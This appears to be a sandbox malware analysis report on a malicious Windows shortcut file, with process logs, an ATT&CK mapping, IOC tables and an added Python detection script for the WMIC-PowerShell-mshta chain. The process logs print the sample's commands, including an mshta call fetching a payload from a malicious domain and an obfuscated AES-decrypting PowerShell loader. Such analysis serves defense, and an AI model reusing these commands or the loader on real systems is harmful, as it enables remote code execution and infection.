Source: powershell.exe, 00000009.00000002.2468649090.0000021DB7ADB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB5%SystemRoot%\system32\mswsock.dll1E88EE0C7484102BEA4492A97B93C9B25CD23C59C0C19974EE48483A82F0A3DACE4B86F4ACDF9EBD8241CFE51CFACA8304C421249AC1ED97B0130EE35D8024FC019004642A1048544B0EFD18F4AB33955150BB878898726DB416D04B2F38F5D64DC34581D0D970265A7861A50C84E3ED14Xv1
Source: mshta.exe, 00000006.00000003.2492073213.000002506C0E6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://vividpulse.pro/Seed/Havoc"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\API _Guide.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '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';function yor ($pajawh){return -split ($pajawh -replace '..', '0x$& ')};$yasaqhf = yor($ddg.substring(0, 2048));$xwh = [system.security.cryptography.aes]::create();$xwh.key = yor($ddg.substring(2048));$xwh.iv = new-object byte[] 16;$rrodudsq = $xwh.createdecryptor();$jpgioi = [system.string]::new($rrodudsq.transformfinalblock($yasaqhf, 0,$yasaqhf.length)); sal fd $jpgioi.substring(3,3); fd $jpgioi.substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
MITRE ATT&CK matrix, listed by tactic (leading numbers as shown on the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 21 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 21 Masquerading; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 11 Security Software Discovery; 11 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 23 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Email Collection; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1582715 | Sample: GYede3Gwn0.lnk | Startdate: 31/12/2024 | Architecture: WINDOWS | Score: 100

Domains contacted: vividpulse.pro, x1.i.lencr.org, bg.microsoft.map.fastly.net
Top-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Windows shortcut file (LNK) starts blacklisted processes; 6 other signatures

Process tree (node numbers are the graph's own; numbers in parentheses are the graph's created-file / registry-value badges):

2 GYede3Gwn0.lnk (start)
  - 13 WMIC.exe (1)
      signatures: Contains functionality to create processes via WMI; Creates processes via WMI
      - 19 powershell.exe (7)
          signature: Windows shortcut file (LNK) starts blacklisted processes
          - 24 powershell.exe (7)
              signature: Windows shortcut file (LNK) starts blacklisted processes
              - 29 mshta.exe (16)
                  network: vividpulse.pro, 92.113.18.193:443 (source ports 49711, 49731), UKRTELNETUA, Ukraine
                  dropped: C:\Users\user\AppData\Local\...\Havoc[1] (PE32)
                  signatures: Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found
                  - 34 powershell.exe (17 18)
                      - 36 Acrobat.exe (73)
                          - 40 AcroCEF.exe (106)
                              - 42 AcroCEF.exe
                      - 38 conhost.exe
          - 27 conhost.exe
      - 22 conhost.exe
  - 16 svchost.exe (1 1)
      network: 127.0.0.1
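The chain in the graph above (WMIC.exe spawning PowerShell, PowerShell spawning PowerShell, PowerShell spawning mshta.exe, mshta.exe reaching vividpulse.pro on 443 and then spawning PowerShell again) is exactly what the Sigma rules listed in this report key on. The following Python is an added example and not part of the Joe Sandbox report: it re-implements those parent/child checks over Sysmon-style process-creation and network events and runs them on a constructed event set modelled on the graph. The PIDs, the Acrobat.exe path, the explorer/notepad noise events and the rule names are constructed for illustration; the WMIC, PowerShell and mshta paths are the standard Windows ones.

```python
"""Process-tree detection for the LNK -> WMIC -> PowerShell -> MSHTA chain.

Added example, not part of the Joe Sandbox report. Re-implements the checks
behind the report's Sigma hits (WMIC spawning a shell, nested PowerShell,
MSHTA spawning a shell) plus mshta.exe talking to a web port, over a
constructed Sysmon-style event set modelled on the behaviour graph.
"""
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Script hosts / interpreters an attacker chains through.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
          "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
WEB_PORTS = {80, 443}


@dataclass(frozen=True)
class ProcEvent:          # Sysmon EID 1 subset
    pid: int
    ppid: int
    image: str


@dataclass(frozen=True)
class NetEvent:           # Sysmon EID 3 subset
    pid: int
    dest_host: str
    dest_port: int


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events mirroring the report's behaviour graph. PIDs are
# arbitrary; PID 2 is the sandbox start node and has no event of its own.
PROCESSES = [
    ProcEvent(13, 2, r"C:\Windows\System32\wbem\WMIC.exe"),
    ProcEvent(19, 13, PS),
    ProcEvent(24, 19, PS),
    ProcEvent(29, 24, r"C:\Windows\System32\mshta.exe"),
    ProcEvent(34, 29, PS),
    ProcEvent(36, 34, r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe"),  # constructed path
    ProcEvent(50, 2, r"C:\Windows\explorer.exe"),                                 # benign noise
    ProcEvent(51, 50, r"C:\Windows\System32\notepad.exe"),
]
NETWORK = [NetEvent(29, "vividpulse.pro", 443)]


def _name(image: str) -> str:
    """Lower-cased image file name; ntpath handles Windows paths on any host."""
    return ntpath.basename(image).lower()


def build_index(procs: List[ProcEvent]) -> Dict[int, ProcEvent]:
    return {p.pid: p for p in procs}


def ancestry(pid: int, index: Dict[int, ProcEvent]) -> List[str]:
    """Image names from the oldest known ancestor down to `pid` (cycle-safe)."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(ntpath.basename(index[pid].image))
        pid = index[pid].ppid
    return chain[::-1]


def detect(procs: List[ProcEvent], net: List[NetEvent]) -> List[Tuple[str, int, str]]:
    """Return (rule, pid, detail) for every parent/child or network hit."""
    index = build_index(procs)
    hits: List[Tuple[str, int, str]] = []
    for p in procs:
        parent = index.get(p.ppid)
        if parent is None:
            continue
        pn, cn = _name(parent.image), _name(p.image)
        chain = " -> ".join(ancestry(p.pid, index))
        if pn == "wmic.exe" and cn in SHELLS:
            hits.append(("wmic_spawns_shell", p.pid, chain))
        if pn == "powershell.exe" and cn == "powershell.exe":
            hits.append(("nested_powershell", p.pid, chain))
        if pn in {"powershell.exe", "cmd.exe"} and cn == "mshta.exe":
            hits.append(("shell_spawns_mshta", p.pid, chain))
        if pn == "mshta.exe" and cn in SHELLS:
            hits.append(("mshta_spawns_shell", p.pid, chain))
    for n in net:
        proc = index.get(n.pid)
        if proc and _name(proc.image) == "mshta.exe" and n.dest_port in WEB_PORTS:
            hits.append(("mshta_network_connection", n.pid, f"{n.dest_host}:{n.dest_port}"))
    return hits


def rule_names(hits: List[Tuple[str, int, str]]) -> List[str]:
    return sorted({h[0] for h in hits})


def flagged_pids(hits: List[Tuple[str, int, str]]) -> Set[int]:
    return {h[1] for h in hits}


if __name__ == "__main__":
    for rule, pid, detail in detect(PROCESSES, NETWORK):
        print(f"{rule:26} pid={pid:<4} {detail}")
```

Each hit carries the full ancestry string, so a single alert on the final PowerShell already shows the WMIC -> PowerShell -> PowerShell -> mshta -> PowerShell lineage an analyst needs; the explorer -> notepad pair produces nothing, which is the regression check.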

Source | Detection | Scanner | Label
GYede3Gwn0.lnk | 18% | ReversingLabs | Shortcut.Trojan.Pantera
GYede3Gwn0.lnk | 26% | Virustotal | -
No Antivirus matches
Source | Detection | Scanner | Label
https://vividpulse.pro/Seed/Havocrs | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/HavocW0 | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/Havoc | 100% | Avira URL Cloud | malware
https://vividpulse.pro/Quantum/XZJKPUBX.m | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantu | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Fox/API%20_Guide.pdf | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Qu | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quan | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantum/XZJKPUB | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantum/XZJKPUBX.ms | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/Havoc... | 100% | Avira URL Cloud | malware
https://vividpulse.pro/Seed/Havochttps://vividpulse.pro/Seed/Havoc | 0% | Avira URL Cloud | safe
https://vividpulse.pro/ | 0% | Avira URL Cloud | safe
https://vividpulse.p | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantum/XZ | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/Havoc1 | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/HavocH | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantum/XZJK | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/HavocC | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantum/X | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantum/XZJKPUBX.msi | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/HavocYmsz9 | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/HavocV | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantum/XZJKP | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/HavocP | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Q | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Fox/API | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/HavocVBS;.VBE;. | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quant | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Qua | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/Havoc)8x | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/Havocq | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantum/XZJKPUBX. | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/Havocl | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/Havoc...8j | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/HavoccoLMEMHX | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/Havoc$global:? | 0% | Avira URL Cloud | safe
https://vividpulse.pro | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/Havoc9r | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantum | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Seed/HavocC: | 0% | Avira URL Cloud | safe
https://vividpulse.pr | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantum/XZJ | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantum/XZJKPU | 0% | Avira URL Cloud | safe
https://vividpulse.pro/?P | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantum/XZJKPUBX | 0% | Avira URL Cloud | safe
https://vividpulse.pro/Quantum/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | - | high
vividpulse.pro | 92.113.18.193 | true | true | - | unknown
x1.i.lencr.org | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
https://vividpulse.pro/Seed/Havoc | true | Avira URL Cloud: malware | unknown
https://vividpulse.pro/Fox/API%20_Guide.pdf | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Quantum/XZJKPUBX.msi | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://vividpulse.pro/Seed/Havocrs | powershell.exe, 00000005.00000002.2174817634.0000024DD7392000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Quantum/XZJKPUB | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Quantu | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Qu | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Quantum/XZJKPUBX.ms | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/HavocW0 | mshta.exe, 00000006.00000003.2487930786.000002486532B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.000002486530D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508342660.000002486532C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Quan | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Quantum/XZJKPUBX.m | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://vividpulse.pro/Seed/Havoc... | mshta.exe, 00000006.00000003.2486953315.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509397222.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507637529.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://vividpulse.pro/Seed/Havochttps://vividpulse.pro/Seed/Havoc | mshta.exe, 00000006.00000003.2497045401.000002506DB25000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Quantum/XZ | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/Havoc1 | mshta.exe, 00000006.00000003.2486953315.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509397222.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507637529.0000025067F7D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.p | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://vividpulse.pro/ | mshta.exe, 00000006.00000002.2508342660.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487930786.0000024865346000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/HavocH | mshta.exe, 00000006.00000002.2508719891.0000024866CB0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Quantum/XZJK | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/HavocC | mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micros | powershell.exe, 00000005.00000002.2180956426.0000024DF141A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://vividpulse.pro/Quantum/X | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://vividpulse.pro/Seed/HavocV | mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/HavocYmsz9 | mshta.exe, 00000006.00000003.2488150003.000002506C06F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Quantum/XZJKP | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000005.00000002.2176748936.0000024DD9263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FA81000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://vividpulse.pro/Seed/HavocP | powershell.exe, 00000005.00000002.2176748936.0000024DD96E9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Q | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/HavocVBS;.VBE;. | powershell.exe, 00000005.00000002.2176502931.0000024DD7560000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.12.dr | false | - | high
https://vividpulse.pro/Fox/API | powershell.exe, 00000009.00000002.2333960196.0000021D9FEB5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000009.00000002.2333960196.0000021D9FCAA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://vividpulse.pro/Quant | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000009.00000002.2333960196.0000021D9FCAA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://vividpulse.pro/Qua | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000009.00000002.2410810307.0000021DAFAF2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 00000008.00000003.2197751329.000001549C900000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.dr | false | - | high
http://crl.ver) | svchost.exe, 00000008.00000002.3418085675.000001549CA85000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://vividpulse.pro/Seed/Havoc)8x | mshta.exe, 00000006.00000003.2487930786.000002486532B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.000002486530D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508342660.000002486532C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/Havocq | mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/Havocp | powershell.exe, 00000005.00000002.2176748936.0000024DD9241000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://github.com/Pester/Pester | powershell.exe, 00000009.00000002.2333960196.0000021D9FCAA000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://vividpulse.pro/Quantum/XZJKPUBX. | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/Havoc...8j | mshta.exe, 00000006.00000003.2486953315.0000025067F56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507637529.0000025067F57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509397222.0000025067F58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/Havocl | mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/Havoc$global:? | powershell.exe | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/HavoccoLMEMHX | mshta.exe, 00000006.00000002.2510242583.000002506C107000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2507575546.000002506C105000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488097868.000002506C104000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod1C: | edb.log.8.dr | false | - | high
https://vividpulse.pro/Quantum | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro | powershell.exe, 00000009.00000002.2333960196.0000021D9FEB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/Havoc9r | mshta.exe, 00000006.00000002.2508410347.000002486536B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486499146.0000024865368000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Seed/HavocC: | mshta.exe, 00000006.00000003.2486499146.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506163477.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508221682.00000248652D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506268055.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508521334.00000248653BB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pr | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Quantum/XZJKPU | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000005.00000002.2176748936.0000024DD929D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2176748936.0000024DD9263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2333960196.0000021D9FA81000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://vividpulse.pro/?P | mshta.exe, 00000006.00000002.2508342660.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487930786.0000024865346000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Quantum/XZJ | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vividpulse.pro/Quantum/XZJKPUBX | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.v | mshta.exe, 00000006.00000003.2486499146.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506242592.00000248653CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506163477.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508548791.00000248653CB000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://vividpulse.pro/Quantum/ | powershell.exe, 00000009.00000002.2333960196.0000021D9FFAE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
92.113.18.193 | vividpulse.pro | Ukraine | 6849 | UKRTELNETUA | true
                                          IP
